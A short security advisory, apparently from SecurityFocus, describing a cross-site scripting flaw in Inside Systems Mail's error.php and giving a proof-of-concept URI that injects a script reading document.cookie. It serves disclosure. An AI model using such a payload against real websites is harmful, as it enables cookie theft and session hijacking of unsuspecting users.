Inside Systems Mail Error.PHP Cross-Site Scripting Vulnerability

An attacker can exploit this issue with a web client.

The following proof-of-concept URI is available:

http://www.example.com/<path_to_ismail>/error.php?error=XSS%20attack%3Cscript%3Ealert(document.cookie);%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus